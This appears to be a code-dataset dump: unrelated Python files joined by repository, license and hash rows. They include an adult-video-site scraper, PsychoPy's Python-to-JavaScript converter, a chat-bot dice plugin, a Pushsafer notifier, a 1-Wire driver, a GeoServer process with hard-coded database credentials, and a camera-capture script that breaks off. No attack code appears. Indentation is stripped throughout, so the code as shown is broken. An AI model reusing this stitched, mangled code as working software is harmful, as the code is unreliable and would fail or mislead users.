def get_cast_allpage_by_avso(cast_name):
all_info=[]
for i in range(1,10):
info= get_cast_onepage_by_avso(cast_name,i)
if info==-1:
break
else:
all_info+=info
print all_info
savefile="d:\\"+cast_name+".txt"
with open(savefile,"w") as fs:
for name,vid,date in all_info:
fs.write(name.encode("utf-8")+"\t"+vid+"\t"+date+"\n")
print "file create done!"
# step:1
def serch_movie_byvid(vid):
url='https://avso.pw/cn/search/'+vid
#url='https://avso.pw/cn/search/'+vid #110615_185'
data=download_html(url)
if data:
#print response.content.encode("gbk")
soup = BeautifulSoup(data,"lxml")
ret=[]
try:
notfound=soup.find('div',class_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
types = soup.select('div.item > a')
items = soup.select('div.item > a > div.photo-info > span')
for a,item in zip(types,items):
#print a['class'][1],a['href'],item.get_text() # ['movie-box', 'mcaribbeancom']
cast=get_movie_cast(a['href'])
ret.append((item.get_text(),cast,a['class'][1]))
return ret
except Exception,e:
print e
return -1
#print "vcast not found!"
#step 2:得到片子的所有演员名
def get_movie_cast(url):
# url=r' https://avso.pw/cn/movie/yus'
data=download_html(url)
ret=[]
if data:
soup = BeautifulSoup(data,"lxml")
try:
notfound=soup.find('div',clasas_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
actress=soup.find_all('a',class_="avatar-box")
for a in actress:
span=a.find("span")
ret.append(span.text)
return " ".join(ret)
except Exception,e:
print e
return -1
#print "vcast not found!"
#wrapper function
def get_vidlist_full_info():
#idlist=['082516-001','080117_01','062717_110']
idlist= walkpath(r"e:\\avstore")
print idlist
infos=[]
for id in idlist:
info = serch_movie_byvid(id)
if info!=-1:
infos+=info
#print infos
infofile='d:\\info.txt'
with open(infofile,"w") as f:
for a,b,c in infos:
print a,b,c
f.write(a+","+b+","+c+"\n")
print "File saved!%s"%infofile
def walkpath(path):
files=[x for x in os.listdir(path) if all([os.path.splitext(x)[1]=='.txt', not os.path.isdir(path+"\\"+x)])]
store=[]
for txtfile in files:
for line in open(path+"/"+txtfile):
p,f=os.path.split(line)
id=common.format_rule1(f.replace("\n",""))
if id!="":
#store.append((id,txtfile))
store.append(id)
return store
if __name__ == '__main__' :
#TXT_STORE_PATH="d:\\avstore\\"
get_vidlist_full_info()
# idlist=['082516-001','080117_01','062717_110']
#ret=serch_movie_byvid('082516-001')
#for a,b,c in ret:
# print a,b,c
| apache-2.0 | 8,082,208,100,537,435,000 | 24.361607 | 112 | 0.492871 | false |
psychopy/psychopy | psychopy/experiment/py2js.py | 1 | 7669 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Part of the PsychoPy library
# Copyright (C) 2002-2018 Jonathan Peirce (C) 2019-2021 Open Science Tools Ltd.
# Distributed under the terms of the GNU General Public License (GPL).
"""Converting code parameters and components from python (PsychoPy)
to JS (ES6/PsychoJS)
"""
import ast
import astunparse
import esprima
from os import path
from psychopy.constants import PY3
from psychopy import logging
if PY3:
from past.builtins import unicode
from io import StringIO
else:
from StringIO import StringIO
from psychopy.experiment.py2js_transpiler import translatePythonToJavaScript
class NamesJS(dict):
def __getitem__(self, name):
try:
return dict.__getitem__(self, name)
except:
return "{}".format(name)
namesJS = NamesJS()
namesJS['sin'] = 'Math.sin'
namesJS['cos'] = 'Math.cos'
namesJS['tan'] = 'Math.tan'
namesJS['pi'] = 'Math.PI'
namesJS['rand'] = 'Math.random'
namesJS['random'] = 'Math.random'
namesJS['sqrt'] = 'Math.sqrt'
namesJS['abs'] = 'Math.abs'
namesJS['randint'] = 'util.randint'
namesJS['round'] = 'util.round' # better than Math.round, supports n DPs arg
namesJS['sum'] = 'util.sum'
class TupleTransformer(ast.NodeTransformer):
""" An ast subclass that walks the abstract syntax tree and
allows modification of nodes.
This class transforms a tuple to a list.
:returns node
"""
def visit_Tuple(self, node):
return ast.List(node.elts, node.ctx)
class Unparser(astunparse.Unparser):
"""astunparser had buried the future_imports option underneath its init()
so we need to override that method and change it."""
def __init__(self, tree, file):
"""Unparser(tree, file=sys.stdout) -> None.
Print the source for tree to file."""
self.f = file
self.future_imports = ['unicode_literals']
self._indent = 0
self.dispatch(tree)
self.f.flush()
def unparse(tree):
v = StringIO()
Unparser(tree, file=v)
return v.getvalue()
def expression2js(expr):
"""Convert a short expression (e.g. a Component Parameter) Python to JS"""
# if the code contains a tuple (anywhere), convert parenths to be list.
# This now works for compounds like `(2*(4, 5))` where the inner
# parenths becomes a list and the outer parens indicate priority.
# This works by running an ast transformer class to swap the contents of the tuple
# into a list for the number of tuples in the expression.
try:
syntaxTree = ast.parse(expr)
except Exception:
try:
syntaxTree = ast.parse(unicode(expr))
except Exception as err:
logging.error(err)
return
for node in ast.walk(syntaxTree):
TupleTransformer().visit(node) # Transform tuples to list
# for py2 using 'unicode_literals' we don't want
if isinstance(node, ast.Str) and type(node.s)==bytes:
node.s = unicode(node.s, 'utf-8')
elif isinstance(node, ast.Str) and node.s.startswith("u'"):
node.s = node.s[1:]
if isinstance(node, ast.Name):
if node.id == 'undefined':
continue
node.id = namesJS[node.id]
jsStr = unparse(syntaxTree).strip()
if not any(ch in jsStr for ch in ("=",";","\n")):
try:
jsStr = translatePythonToJavaScript(jsStr)
if jsStr.endswith(';\n'):
jsStr = jsStr[:-2]
except:
# If translation fails, just use old translation
pass
return jsStr
def snippet2js(expr):
"""Convert several lines (e.g. a Code Component) Python to JS"""
# for now this is just adding ';' onto each line ending so will fail on
# most code (e.g. if... for... will certainly fail)
# do nothing for now
return expr
def findUndeclaredVariables(ast, allUndeclaredVariables):
"""Detect undeclared variables
"""
undeclaredVariables = []
for expression in ast:
if expression.type == 'ExpressionStatement':
expression = expression.expression
if expression.type == 'AssignmentExpression' and expression.operator == '=' and expression.left.type == 'Identifier':
variableName = expression.left.name
if variableName not in allUndeclaredVariables:
undeclaredVariables.append(variableName)
allUndeclaredVariables.append(variableName)
elif expression.type == 'IfStatement':
if expression.consequent.body is None:
consequentVariables = findUndeclaredVariables(
[expression.consequent], allUndeclaredVariables)
else:
consequentVariables = findUndeclaredVariables(
expression.consequent.body, allUndeclaredVariables)
undeclaredVariables.extend(consequentVariables)
elif expression.type == "ReturnStatement":
if expression.argument.type == "FunctionExpression":
consequentVariables = findUndeclaredVariables(
expression.argument.body.body, allUndeclaredVariables)
undeclaredVariables.extend(consequentVariables)
return undeclaredVariables
def addVariableDeclarations(inputProgram, fileName):
"""Transform the input program by adding just before each function
a declaration for its undeclared variables
"""
# parse Javascript code into abstract syntax tree:
# NB: esprima: https://media.readthedocs.org/pdf/esprima/4.0/esprima.pdf
try:
ast = esprima.parseScript(inputProgram, {'range': True, 'tolerant': True})
except esprima.error_handler.Error as err:
logging.error("{0} in {1}".format(err, path.split(fileName)[1]))
return inputProgram # So JS can be written to file
# find undeclared vars in functions and declare them before the function
outputProgram = inputProgram
offset = 0
allUndeclaredVariables = []
for expression in ast.body:
if expression.type == 'FunctionDeclaration':
# find all undeclared variables:
undeclaredVariables = findUndeclaredVariables(expression.body.body,
allUndeclaredVariables)
# add declarations (var) just before the function:
funSpacing = ['', '\n'][len(undeclaredVariables) > 0] # for consistent function spacing
declaration = funSpacing + '\n'.join(['var ' + variable + ';' for variable in
undeclaredVariables]) + '\n'
startIndex = expression.range[0] + offset
outputProgram = outputProgram[
:startIndex] + declaration + outputProgram[
startIndex:]
offset += len(declaration)
return outputProgram
if __name__ == '__main__':
for expr in ['sin(t)', 't*5',
'(3, 4)', '(5*-2)', # tuple and not tuple
'(1,(2,3), (1,2,3), (-4,-5,-6))', '2*(2, 3)', # combinations
'[1, (2*2)]', # List with nested operations returns list + nested tuple
'(.7, .7)', # A tuple returns list
'(-.7, .7)', # A tuple with unary operators returns nested lists
'[-.7, -.7]', # A list with unary operators returns list with nested tuple
'[-.7, (-.7 * 7)]']: # List with unary operators and nested tuple with operations returns list + tuple
print("{} -> {}".format(repr(expr), repr(expression2js(expr))))
| gpl-3.0 | 7,784,150,697,449,166,000 | 36.778325 | 129 | 0.61716 | false |
exp-publishing/cloudbot-plugins | plugins/gaming.py | 1 | 4430 | """
gaming.py
Dice, coins, and random generation for gaming.
Modified By:
- Luke Rogers <https://github.com/lukeroge>
- Josh Elsasser <https://github.com/jaelsasser>
License:
GPL v3
"""
import asyncio
import random
import re
from cloudbot import hook
whitespace_re = re.compile(r'\s+')
valid_diceroll = re.compile(r'^([+-]?(?:\d+|\d*d(?:\d+|F))(?:[+-](?:\d+|\d*d(?:\d+|F)))*)( .+)?$', re.I)
sign_re = re.compile(r'[+-]?(?:\d*d)?(?:\d+|F)', re.I)
split_re = re.compile(r'([\d+-]*)d?(F|\d*)', re.I)
def n_rolls(count, n):
"""roll an n-sided die count times
:type count: int
:type n: int | str
"""
if n == "F":
return [random.randint(-1, 1) for x in range(min(count, 100))]
if n < 2: # it's a coin
if count < 100:
return [random.randint(0, 1) for x in range(count)]
else: # fake it
return [int(random.normalvariate(.5 * count, (.75 * count) ** .5))]
else:
if count < 100:
return [random.randint(1, n) for x in range(count)]
else: # fake it
return [int(random.normalvariate(.5 * (1 + n) * count,
(((n + 1) * (2 * n + 1) / 6. -
(.5 * (1 + n)) ** 2) * count) ** .5))]
@asyncio.coroutine
@hook.command("roll", "dice")
def dice(text, notice):
"""<dice roll> - simulates dice rolls. Example: 'dice 2d20-d5+4 roll 2': D20s, subtract 1D5, add 4
:type text: str
"""
if hasattr(text, "groups"):
text, desc = text.groups()
else: # type(text) == str
match = valid_diceroll.match(whitespace_re.sub("", text))
if match:
text, desc = match.groups()
else:
notice("Invalid dice roll '{}'".format(text))
return
if "d" not in text:
return
spec = whitespace_re.sub('', text)
if not valid_diceroll.match(spec):
notice("Invalid dice roll '{}'".format(text))
return
groups = sign_re.findall(spec)
total = 0
rolls = []
for roll in groups:
count, side = split_re.match(roll).groups()
count = int(count) if count not in " +-" else 1
if side.upper() == "F": # fudge dice are basically 1d3-2
for fudge in n_rolls(count, "F"):
if fudge == 1:
rolls.append("\x033+\x0F")
elif fudge == -1:
rolls.append("\x034-\x0F")
else:
rolls.append("0")
total += fudge
elif side == "":
total += count
else:
side = int(side)
try:
if count > 0:
d = n_rolls(count, side)
rolls += list(map(str, d))
total += sum(d)
else:
d = n_rolls(-count, side)
rolls += [str(-x) for x in d]
total -= sum(d)
except OverflowError:
# I have never seen this happen. If you make this happen, you win a cookie
return "Thanks for overflowing a float, jerk >:["
if desc:
return "{}: {} ({})".format(desc.strip(), total, ", ".join(rolls))
else:
return "{} ({})".format(total, ", ".join(rolls))
@asyncio.coroutine
@hook.command("choice", "choose")
def choose(text, notice):
"""<choice1>, [choice2], [choice3], etc. - randomly picks one of the given choices
:type text: str
"""
choices = re.findall(r'([^,]+)', text)
if len(choices) == 1:
notice(choose.__doc__)
return
return random.choice(choices)
@asyncio.coroutine
@hook.command(autohelp=False)
def coin(text, notice, action):
"""[amount] - flips [amount] coins
:type text: str
"""
if text:
try:
amount = int(text)
except (ValueError, TypeError):
notice("Invalid input '{}': not a number".format(text))
return
else:
amount = 1
if amount == 1:
action("flips a coin and gets {}.".format(random.choice(["heads", "tails"])))
elif amount == 0:
action("makes a coin flipping motion")
else:
heads = int(random.normalvariate(.5 * amount, (.75 * amount) ** .5))
tails = amount - heads
action("flips {} coins and gets {} heads and {} tails.".format(amount, heads, tails))
| gpl-3.0 | 6,135,678,696,273,625,000 | 28.932432 | 104 | 0.499774 | false |
ivmech/iviny-scope | lib/xlsxwriter/test/comparison/test_outline04.py | 1 | 2728 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, [email protected]
#
import unittest
import os
from ...workbook import Workbook
from ..helperfunctions import _compare_xlsx_files
class TestCompareXLSXFiles(unittest.TestCase):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'outline04.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = ['xl/calcChain.xml', '[Content_Types].xml', 'xl/_rels/workbook.xml.rels']
self.ignore_elements = {}
def test_create_file(self):
"""
Test the creation of a outlines in a XlsxWriter file. These tests are
based on the outline programs in the examples directory.
"""
filename = self.got_filename
####################################################
workbook = Workbook(filename)
worksheet4 = workbook.add_worksheet('Outline levels')
levels = [
"Level 1", "Level 2", "Level 3", "Level 4", "Level 5", "Level 6",
"Level 7", "Level 6", "Level 5", "Level 4", "Level 3", "Level 2",
"Level 1"]
worksheet4.write_column('A1', levels)
worksheet4.set_row(0, None, None, {'level': 1})
worksheet4.set_row(1, None, None, {'level': 2})
worksheet4.set_row(2, None, None, {'level': 3})
worksheet4.set_row(3, None, None, {'level': 4})
worksheet4.set_row(4, None, None, {'level': 5})
worksheet4.set_row(5, None, None, {'level': 6})
worksheet4.set_row(6, None, None, {'level': 7})
worksheet4.set_row(7, None, None, {'level': 6})
worksheet4.set_row(8, None, None, {'level': 5})
worksheet4.set_row(9, None, None, {'level': 4})
worksheet4.set_row(10, None, None, {'level': 3})
worksheet4.set_row(11, None, None, {'level': 2})
worksheet4.set_row(12, None, None, {'level': 1})
workbook.close()
####################################################
got, exp = _compare_xlsx_files(self.got_filename,
self.exp_filename,
self.ignore_files,
self.ignore_elements)
self.assertEqual(got, exp)
def tearDown(self):
# Cleanup.
if os.path.exists(self.got_filename):
os.remove(self.got_filename)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -6,489,329,900,518,712,000 | 31.47619 | 101 | 0.522727 | false |
prasunroypr/digit-recognizer | source/defs.py | 1 | 6607 | ################################################################################
"""
Functions for Digit Recognition
Created on Wed Jun 01 00:00:00 2016
@author: Prasun Roy
@e-mail: [email protected]
"""
################################################################################
# import modules
import matplotlib.pyplot as pplt
import numpy as np
import os
import pandas as pd
import skimage.feature as skim
import sklearn.preprocessing as pp
import time
from conf import _config
from conf import _configinfo
################################################################################
def _fscale(data, split=False, load=False, verbose=False):
# initialize scaler
scaler = pp.MinMaxScaler()
# initialize variables
config = _configinfo()
sdpath = config['root_data_path'] + 'scaled.npy'
# scale data
if verbose: print('scaling features............... ', end = '')
data = np.array(data, dtype='float64')
if load and os.path.isfile(sdpath):
m = np.load(sdpath)[0]
r = np.load(sdpath)[1]
r[r==0] = 1
data = (data - m) / r
elif split:
train = data[:config['train_d']]
valid = data[config['train_d']:]
scaler.fit(train)
m = scaler.data_min_
r = scaler.data_range_
train = scaler.transform(train)
valid = scaler.transform(valid)
data = np.vstack((train, valid))
else:
data = scaler.fit_transform(data)
m = scaler.data_min_
r = scaler.data_range_
if verbose: print('done')
# save scaled config
if not load: np.save(sdpath, np.vstack((m, r)))
# return scaled data
return data
################################################################################
def _haar(data, load=True, save=False, verbose=False):
return data
################################################################################
def _hogs(data, load=True, save=False, verbose=False):
# initialize config
config = _config()
# initialize variables
datapath = config['hogs_data_path']
data_hog = []
# load hog data if exists
if load and os.path.isfile(datapath):
if verbose: print('loading descriptors............ ', end = '')
data_hog = np.load(datapath)
if verbose: print('done')
# calculate hog data otherwise
else:
# initialize variables
ix = config['shape_x']
iy = config['shape_y']
bn = config['bins_n']
cx = config['cell_x']
cy = config['cell_y']
bw = config['blok_w']
bh = config['blok_h']
# perform hog
t_beg = time.time()
size = data.shape[0]
loop = 0
for image in data:
if verbose: print('\rextracting descriptors......... %d%%'
%(loop*100//size), end = '')
desc = skim.hog(image.reshape(ix, iy), orientations=bn,
pixels_per_cell=(cx, cy), cells_per_block=(bw, bh))
data_hog.append(desc)
loop = loop + 1
data_hog = np.array(data_hog, dtype='float64')
t_end = time.time()
if verbose: print('\rextracting descriptors......... done @ %8.2f sec'
%(t_end - t_beg))
# save data
if save:
if verbose: print('saving descriptors............. ', end = '')
np.save(datapath, data_hog)
if verbose: print('done')
# return hog
return data_hog
################################################################################
def _sift(data, load=True, save=False, verbose=False):
return data
################################################################################
def _surf(data, load=True, save=False, verbose=False):
return data
################################################################################
def _plot(classifier, train, valid, step=None, save=False, verbose=False):
# initialize config
config = _config()
# initialize variables
if step is None: step = config['steps_d']
plot_figs_head = config['classifier'] + '-' + config['preprocess']
plot_data_path = config['plot_data_path']
plot_figs_path = config['plot_figs_path']
m_train = train.shape[0]
m_valid = valid.shape[0]
X_valid = valid[:, 1:]
y_valid = valid[:, 0]
error_train = []
error_valid = []
sizes_train = []
# calculate data for plot
for i in range(0, m_train, step):
if verbose: print('\rgenerating plot................ %d%%'
%(i*100//m_train), end = '')
# randomly shuffle training data
np.random.shuffle(train)
# select subset of randomized training data
X_train = train[:i+step, 1:]
y_train = train[:i+step, 0]
# train classifier with selected data
classifier.fit(X_train, y_train)
# cross-validate classifier
p_train = classifier.predict(X_train)
p_valid = classifier.predict(X_valid)
# estimate errors
error_train.append(sum(y_train != p_train) / len(y_train))
error_valid.append(sum(y_valid != p_valid) / m_valid)
sizes_train.append(i+step)
error_train = np.array(error_train, dtype='float64')
error_valid = np.array(error_valid, dtype='float64')
sizes_train = np.array(sizes_train, dtype='uint32')
if verbose: print('\rgenerating plot................ done')
# plot data
pplt.plot(sizes_train, error_train, 'rs-', label='training error')
pplt.plot(sizes_train, error_valid, 'gs-', label='cross-validation error')
pplt.title(plot_figs_head.upper()+' Learning Curve')
pplt.xlabel('number of training instances')
pplt.ylabel('classification error')
pplt.legend()
xmin,xmax = pplt.xlim()
ymin,ymax = pplt.ylim()
pplt.axis([xmin, xmax+step, ymin, ymax+0.01])
pplt.grid(True)
# save data
if save:
if verbose: print('saving plot.................... ', end = '')
data = pd.DataFrame({'x1_TrainSizes':sizes_train,
'y1_TrainError':error_train,
'y2_ValidError':error_valid})
data.to_csv(plot_data_path, index=False)
pplt.savefig(plot_figs_path)
if verbose: print('done')
# display plot
pplt.show()
################################################################################
| gpl-3.0 | -7,425,339,864,518,901,000 | 29.16895 | 80 | 0.49493 | false |
partofthething/home-assistant | homeassistant/components/pushsafer/notify.py | 1 | 6128 | """Pushsafer platform for notify component."""
import base64
import logging
import mimetypes
import requests
from requests.auth import HTTPBasicAuth
import voluptuous as vol
from homeassistant.components.notify import (
ATTR_DATA,
ATTR_TARGET,
ATTR_TITLE,
ATTR_TITLE_DEFAULT,
PLATFORM_SCHEMA,
BaseNotificationService,
)
from homeassistant.const import ATTR_ICON, HTTP_OK
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
_RESOURCE = "https://www.pushsafer.com/api"
_ALLOWED_IMAGES = ["image/gif", "image/jpeg", "image/png"]
CONF_DEVICE_KEY = "private_key"
CONF_TIMEOUT = 15
# Top level attributes in 'data'
ATTR_SOUND = "sound"
ATTR_VIBRATION = "vibration"
ATTR_ICONCOLOR = "iconcolor"
ATTR_URL = "url"
ATTR_URLTITLE = "urltitle"
ATTR_TIME2LIVE = "time2live"
ATTR_PRIORITY = "priority"
ATTR_RETRY = "retry"
ATTR_EXPIRE = "expire"
ATTR_ANSWER = "answer"
ATTR_PICTURE1 = "picture1"
# Attributes contained in picture1
ATTR_PICTURE1_URL = "url"
ATTR_PICTURE1_PATH = "path"
ATTR_PICTURE1_USERNAME = "username"
ATTR_PICTURE1_PASSWORD = "password"
ATTR_PICTURE1_AUTH = "auth"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({vol.Required(CONF_DEVICE_KEY): cv.string})
def get_service(hass, config, discovery_info=None):
"""Get the Pushsafer.com notification service."""
return PushsaferNotificationService(
config.get(CONF_DEVICE_KEY), hass.config.is_allowed_path
)
class PushsaferNotificationService(BaseNotificationService):
"""Implementation of the notification service for Pushsafer.com."""
def __init__(self, private_key, is_allowed_path):
"""Initialize the service."""
self._private_key = private_key
self.is_allowed_path = is_allowed_path
def send_message(self, message="", **kwargs):
"""Send a message to specified target."""
if kwargs.get(ATTR_TARGET) is None:
targets = ["a"]
_LOGGER.debug("No target specified. Sending push to all")
else:
targets = kwargs.get(ATTR_TARGET)
_LOGGER.debug("%s target(s) specified", len(targets))
title = kwargs.get(ATTR_TITLE, ATTR_TITLE_DEFAULT)
data = kwargs.get(ATTR_DATA, {})
# Converting the specified image to base64
picture1 = data.get(ATTR_PICTURE1)
picture1_encoded = ""
if picture1 is not None:
_LOGGER.debug("picture1 is available")
url = picture1.get(ATTR_PICTURE1_URL, None)
local_path = picture1.get(ATTR_PICTURE1_PATH, None)
username = picture1.get(ATTR_PICTURE1_USERNAME)
password = picture1.get(ATTR_PICTURE1_PASSWORD)
auth = picture1.get(ATTR_PICTURE1_AUTH)
if url is not None:
_LOGGER.debug("Loading image from url %s", url)
picture1_encoded = self.load_from_url(url, username, password, auth)
elif local_path is not None:
_LOGGER.debug("Loading image from file %s", local_path)
picture1_encoded = self.load_from_file(local_path)
else:
_LOGGER.warning("missing url or local_path for picture1")
else:
_LOGGER.debug("picture1 is not specified")
payload = {
"k": self._private_key,
"t": title,
"m": message,
"s": data.get(ATTR_SOUND, ""),
"v": data.get(ATTR_VIBRATION, ""),
"i": data.get(ATTR_ICON, ""),
"c": data.get(ATTR_ICONCOLOR, ""),
"u": data.get(ATTR_URL, ""),
"ut": data.get(ATTR_URLTITLE, ""),
"l": data.get(ATTR_TIME2LIVE, ""),
"pr": data.get(ATTR_PRIORITY, ""),
"re": data.get(ATTR_RETRY, ""),
"ex": data.get(ATTR_EXPIRE, ""),
"a": data.get(ATTR_ANSWER, ""),
"p": picture1_encoded,
}
for target in targets:
payload["d"] = target
response = requests.post(_RESOURCE, data=payload, timeout=CONF_TIMEOUT)
if response.status_code != HTTP_OK:
_LOGGER.error("Pushsafer failed with: %s", response.text)
else:
_LOGGER.debug("Push send: %s", response.json())
@classmethod
def get_base64(cls, filebyte, mimetype):
"""Convert the image to the expected base64 string of pushsafer."""
if mimetype not in _ALLOWED_IMAGES:
_LOGGER.warning("%s is a not supported mimetype for images", mimetype)
return None
base64_image = base64.b64encode(filebyte).decode("utf8")
return f"data:{mimetype};base64,{base64_image}"
def load_from_url(self, url=None, username=None, password=None, auth=None):
"""Load image/document/etc from URL."""
if url is not None:
_LOGGER.debug("Downloading image from %s", url)
if username is not None and password is not None:
auth_ = HTTPBasicAuth(username, password)
response = requests.get(url, auth=auth_, timeout=CONF_TIMEOUT)
else:
response = requests.get(url, timeout=CONF_TIMEOUT)
return self.get_base64(response.content, response.headers["content-type"])
_LOGGER.warning("url not found in param")
return None
def load_from_file(self, local_path=None):
"""Load image/document/etc from a local path."""
try:
if local_path is not None:
_LOGGER.debug("Loading image from local path")
if self.is_allowed_path(local_path):
file_mimetype = mimetypes.guess_type(local_path)
_LOGGER.debug("Detected mimetype %s", file_mimetype)
with open(local_path, "rb") as binary_file:
data = binary_file.read()
return self.get_base64(data, file_mimetype[0])
else:
_LOGGER.warning("Local path not found in params!")
except OSError as error:
_LOGGER.error("Can't load from local path: %s", error)
return None
| mit | -6,397,761,538,905,725,000 | 35.915663 | 86 | 0.602807 | false |
thortex/rpi3-webiopi | webiopi_0.7.1/python/webiopi/devices/onewire.py | 1 | 2571 | # Copyright 2012-2013 Eric Ptak - trouch.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from webiopi.devices.bus import Bus, loadModule
EXTRAS = {
"TEMP": {"loaded": False, "module": "w1-therm"},
"2408": {"loaded": False, "module": "w1_ds2408"},
"2413": {"loaded": False, "module": "w1_ds2413"}
}
def loadExtraModule(name):
if EXTRAS[name]["loaded"] == False:
loadModule(EXTRAS[name]["module"])
EXTRAS[name]["loaded"] = True
class OneWire(Bus):
def __init__(self, slave=None, family=0, extra=None):
Bus.__init__(self, "ONEWIRE", "/sys/bus/w1/devices/w1_bus_master1/w1_master_slaves", os.O_RDONLY)
if self.fd > 0:
os.close(self.fd)
self.fd = 0
self.family = family
if slave != None:
addr = slave.split("-")
if len(addr) == 1:
self.slave = "%02x-%s" % (family, slave)
elif len(addr) == 2:
prefix = int(addr[0], 16)
if family > 0 and family != prefix:
raise Exception("1-Wire slave address %s does not match family %02x" % (slave, family))
self.slave = slave
else:
devices = self.deviceList()
if len(devices) == 0:
raise Exception("No device match family %02x" % family)
self.slave = devices[0]
loadExtraModule(extra)
def __str__(self):
return "1-Wire(slave=%s)" % self.slave
def deviceList(self):
devices = []
with open(self.device) as f:
lines = f.read().split("\n")
if self.family > 0:
prefix = "%02x-" % self.family
for line in lines:
if line.startswith(prefix):
devices.append(line)
else:
devices = lines
return devices;
def read(self):
with open("/sys/bus/w1/devices/%s/w1_slave" % self.slave) as f:
data = f.read()
return data
| apache-2.0 | -53,284,425,979,220,800 | 33.743243 | 107 | 0.558149 | false |
NumCosmo/NumCosmo | examples/example_ode_spline.py | 1 | 1165 | #!/usr/bin/env python
try:
import gi
gi.require_version('NumCosmo', '1.0')
gi.require_version('NumCosmoMath', '1.0')
except:
pass
import ctypes
from math import *
from gi.repository import NumCosmoMath as Ncm
from gi.repository import NumCosmo as Nc
from gi.repository import GObject
#
# Initializing the library objects, this must be called before
# any other library function.
#
Ncm.cfg_init ()
class TestClass (Ncm.Model):
def __call__ (self, *args):
return args[0]
aas = TestClass ()
def test (y, x, data):
return y
test.argtypes = [ctypes.c_double, ctypes.c_double, ctypes.c_char_p]
test.restype = ctypes.c_double
s = Ncm.SplineCubicNotaknot.new ()
os = Ncm.OdeSpline.new (s, test)
os.set_reltol (1.0e-3)
os.props.xi = 0.0
os.props.xf = 5.0
os.props.yi = 1.0
nhaca = [1,2,3,4]
os.prepare (id (nhaca))
ss = os.peek_spline()
for i in range (ss.len):
print ("%d % 22.15g % 22.15g % 22.15g % 22.15g % 22.15g" % (i, ss.xv.get (i), ss.yv.get (i), ss.b.get (i), ss.c.get(i), ss.d.get(i)))
#for i in range (100):
# x = 1.0 / 99.0 * i
# expx = exp (x)
# odex = ss.eval (x)
# print (x, expx, odex, fabs ((expx - odex) / expx))
| gpl-3.0 | 8,754,895,868,490,639,000 | 19.438596 | 137 | 0.64206 | false |
Geodan/natuurbandmodel | server-wps/wildfire_makelcp.py | 1 | 1431 | from geoserver.wps import process
from com.ziclix.python.sql import zxJDBC
jdbc_url = "jdbc:postgresql://192.168.40.5:3389/research"
username = "modeluser"
password = "modeluser"
driver = "org.postgresql.Driver"
cgi_url = "http://model.geodan.nl/main/gmi/cgi-bin/"
@process(
title='MakeLcp',
description='Build landscape file',
inputs={
'userid' : (int, 'User ID'),
'terreinid': (int,'Terrein ID'),
'landscapename': (str,'Name of landscape')
},
outputs={
'string': (str,'JSON string')
}
)
def run(userid, terreinid, landscapename):
#Connect to postgres
conn = zxJDBC.connect(jdbc_url,username, password, driver)
cur = conn.cursor()
query = """
INSERT INTO administration.runs ("user", model, status, percentage, lastupdate) VALUES (?,?,?, ?, now());
"""
data = [1,4,"scheduled",0]
cur.execute(query, data)
conn.commit()
query = """SELECT MAX(id) FROM administration.runs;"""
cur.execute(query)
result = cur.fetchone()
runid = result[0]
query = """
INSERT INTO administration.params_makelcp
(run, terrein_id, terrein_name)
VALUES
(?, ?, ?);
"""
data = [runid,terreinid,landscapename]
cur.execute(query, data )
conn.commit()
import subprocess
p = subprocess.Popen(['/usr/bin/curl','-u', 'demo:demo',cgi_url+'makeLcp.py'])
p.daemon = True
return '{"runid":'+str(runid)+',"status":"scheduled","percentage":0}'
| mit | 4,120,670,946,866,093,600 | 25 | 108 | 0.638714 | false |
frederica07/Dragon_Programming_Process | PyOpenGL-3.0.2/OpenGL/GL/EXT/cmyka.py | 1 | 1439 | '''OpenGL extension EXT.cmyka
This module customises the behaviour of the
OpenGL.raw.GL.EXT.cmyka to provide a more
Python-friendly API
Overview (from the spec)
This extension provides a simple method for OpenGL to read and store
images whose pixels have CMYK or CMYKA formats. The algorithms used to
convert to RGBA from CMYKA and to convert back from RGBA to CMYKA are of
the "black-box" nature, meaning that the application has little control
over how the conversion is done. Also, this black-box mechanism is
available only for transfers to or from memory, not for internal copies
of pixel data (such as invoked by CopyPixels, CopyTexImage1D, etc.)
However, the defined mechanism nicely handles 5-component CMYKA images,
and it is very easy to use.
A more configurable and potentially higher quality color conversion can
be implemented using the color tables, the color matrix, and possibly 3D
and 4D texture lookup. Such a color conversion also applies to copied
pixel data.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/EXT/cmyka.txt
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions, wrapper
from OpenGL.GL import glget
import ctypes
from OpenGL.raw.GL.EXT.cmyka import *
### END AUTOGENERATED SECTION
from OpenGL import images as _i
_i.COMPONENT_COUNTS[ GL_CMYK_EXT ] = 4
_i.COMPONENT_COUNTS[ GL_CMYKA_EXT ] = 5
| bsd-2-clause | 8,254,447,988,783,673,000 | 38.972222 | 73 | 0.783878 | false |
chaowu2009/stereo-vo | tools/capture_TwoCameras_saveImagesOnly.py | 1 | 2289 | import numpy as np
import cv2
import time
import matplotlib.pylab as plt
"""
Make sure that you hold the checkerboard horizontally (more checkers horizontally than vertically).
In order to get a good calibration you will need to move the checkerboard around in the camera frame such that:
the checkerboard is detected at the left and right edges of the field of view (X calibration)
the checkerboard is detected at the top and bottom edges of the field of view (Y calibration)
the checkerboard is detected at various angles to the camera ("Skew")
the checkerboard fills the entire field of view (Size calibration)
checkerboard tilted to the left, right, top and bottom (X,Y, and Size calibration)
"""
left = 1
right = 2
time_in_ms= 1000/100
#folder = "/home/cwu/Downloads/";
folder = "/home/hillcrest/project/stereo-calibration/calib_imgs/ARC/"
folder = "/home/hillcrest/project/stereo-calibration/calib_imgs/ARC/"
